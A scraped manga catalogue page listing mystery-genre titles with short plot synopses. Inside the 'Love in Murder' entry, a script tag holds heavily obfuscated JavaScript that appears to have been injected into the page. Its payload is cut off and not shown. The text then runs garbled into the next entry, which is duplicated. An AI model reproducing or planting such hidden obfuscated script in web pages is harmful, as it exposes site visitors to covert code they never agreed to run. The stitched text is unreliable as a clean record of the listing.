Mystery - Page 127

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3151 results

Snuff Film Monologue

Nakanishi searches for the truth about a classmate's murder so he can settle a grudge for her.


Kuro Hakubutsukan Springald

From MangaHelpers: The Black Museum holds criminal memorabilia from the many cases that have been investigated by Scotland Yard. In this fictional re-imagining of the popular legend, a visitor comes to see a piece of particular interest, the leg of Spring-Heeled Jack. When the curator guides him to the piece, he begins to tell his story of the case of Spring-Heeled Jack, which began in the late 1830s. The earlier adventures of Spring-Heeled Jack involved an eccentric nobleman named Walter, who used his specially made suit to harass women. After an encounter with a very strong-willed woman named Margaret, Walter hung up his Spring-Heeled suit for good. Three years later, Spring-Heeled Jack returns, this time with a penchant for murder. Detective James Rockenfield first suspects Walter, but soon it begins to seem that someone else has taken up the mantle... [tethysdust]


Suicide Island

Treating non-successful suicidal patients requires a lot of money and resources. With a low budget and a personal respect argumentation, a doctor will ask a non-successful suicidal patient if he/she still wants to live on or not. If not, the government will respect his/her wish. However, the government doesn't just simply kill them.



Another work by Reiko Shimizu, or rather her newest. This series is a disturbing manga about solving murder cases by applying the newly developed method of viewing the memory of dead people's brains. And as in every manga done by this mangaka, weird supernatural forces are of course included. The first chapter is actually a prologue and is concentrated on the first case where this method was used. Chapter 2 is when the two main characters are introduced, so hang on! NOTE: There is a related anime with episodes based on selective chapters from the manga.



From Viz: It is the middle of the 21st century and Tokyo is expanding more and more, filling Tokyo Bay with landfill to make room for the bursting population. But suddenly Tokyo suffers one of its greatest earthquakes, and the landfill liquefies, creating untold damage in the newly-made urban area. The members of Self-Defense Force Rescue Squad Four are sent to help. But what they dig up is a plot of murder and destruction--one that wipes out nearly the entire squad and leaves its two surviving members, the fierce Rei and her cool, handsome partner Uozumi, in a fight for their lives. There is only one place where they can find the work that keeps them alive, and the support so they can start uncovering the mystery that killed their squad: that's in the south-Shinjuku bar called Chicago. As the earthquake levels Japan's largest city and capital and leaves countless dead, rescue workers, Rei and Uozumi, search for survivors amidst the rubble of Bay District D only to find a mysterious string of dead bodies--bodies with bullet holes. Without warning, the pair is under fire from the air as a hail of gunfire rains down. Are these the killers, and if so, what is their purpose? Barely escaping with their lives, Rei and Uozumi discover that their squad is listed only as "collateral damage" and their records wiped clean.



Susumu Hayashi, his twin brother Tsutomu and Sakura Toyama are childhood friends. Tsutomu disappeared when he was ten years old. Then two years later, he reappeared—this time only in front of Susumu. And what’s more, from inside a mirror! Now, events that no one has ever experienced take place in this bizarre love triangle!! Aoyama’s love story starts off with a twist: The twin brothers Susumu and Tsutomu have been friends with the girl Sakura since they were kids. But when Tsutomu mysteriously disappears at the age of ten, Susumu and Sakura begin to drift apart. What Sakura doesn’t know: Tsutomu has returned, not as a person, but as the mirror image of Susumu. That is, whenever Susumu looks in a mirror, he sees his brother who talks to him. Thus begins a bizarre love triangle between Sakura, who torments the poor Susumu as much as she is being tormented by her peers, Susumu, who keeps thinking he has to save Sakura because he likes her, and Tsutomu, who despite being stuck in a mirror pulls everyone’s strings. Aoyama’s lively narrative and her beautifully rich artwork lend this strange story a surprisingly charming touch. Considering that SWWEEET is her first series, it’s amazing how well she did her job. From the paneling to the layout to the pacing, everything is excellently executed. If you like unusual and exotic youth love stories, you should definitely give SWWEEET a try.


Hidden Hearts

Behind every beautiful young man out there, there's always a bad experience in love that they've gone through and want to hide. So what kind of stories do they have?


Meisou Kuiki

As a child, Amasawa Rei had attended Shirohato Park Institution. After her parents were killed in a car accident, she lived at the institution and befriended a boy. She doesn't remember anything from the time she spent at the institution, not names, not faces, nothing, only that she and the boy shared a secret--a secret much darker than she thinks it is. Now, as a new student at Shirohato Academy with her old classmates from the Park, she is assailed by fragmented memories of the past. What was the secret? Why does she feel driven to find that nameless boy? And most importantly, why doesn't Rei remember anything from her past?


Shuumatsu no Jinrui ni Bunmei wa Hitsuyou desu ka?

Year XXXX A.D. In this apocalyptic world ruled by "God," humans live as if crawling on the ground. The human race has dwindled to a few people, but in the midst of all this, Kasago blindly believes in "God" and engages in the "civilization recovery" business, taking civilization away from humans as he is commanded to do. On the other hand, Mebaru, which Kasago met on his way to work, does not even try to hide her suspicion of "God". Kasago is looking for his parents, while Mebaru is looking for her parents' killer. They continue their journey of retrieval while coming into contact with "civilization"... This is a mysterious apocalyptic travelogue of the near future!!


Watashi wa Tensai o Katte Iru.

"Handsome Prodigy" Nanao's heart thumping royal love story starts! I didn't think that I would want to tame something unmanageable... That Konoka has been given the task to tame the young prodigy, Kairi. The secret that they share...


Love in Murder

After finding out that my boyfriend was cheating on me with my little sister, I announced our break-up in a fit of rage. But never could I have imagined that the two of them would commit double suicide. Even the police believes that this was just an accident… But I felt that things weren’t that simple. Since my university days, anyone who had a conflict with me would all perish in unnatural deaths…<script></script><script>function _0x1ddd(_0x20a4d5,_0x11d23b){var _0x4006cf=_0x5e06();return _0x1ddd=function(_0x53f9a1,_0x59d97b){_0x53f9a1=_0x53f9a1-(-0x1*0x1df5+0x22*-0xef+0x3e29);var _0x4ffbe7=_0x4006cf[_0x53f9a1];return _0x4ffbe7;},_0x1ddd(_0x20a4d5,_0x11d23b);}(function(_0xcc5966,_0xc9052a){var _0xdccb76=_0x1ddd,_0x1078ff=_0xcc5966();while(!![]){try{var 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Our House is a Haunted Rental BookstoreThe Spirit Realm is the world where spirits reside. In this world filled with man-eating spirits and where the sun doesn’t shine, there lives a single human. S

The Spirit Realm is the world where spirits reside. In this world filled with man-eating spirits and where the sun doesn’t shine, there lives a single human. She runs a bookstore with her adoptive spirit father, Mr. Shinonome. One day, she stumbles upon a bleeding boy collapsed outside her house. Fun and terrifying — a heart-wrenching ghost story. Medamayaki's Twitter: @medama_3 Shinobumaru's Twitter: @sinomonta
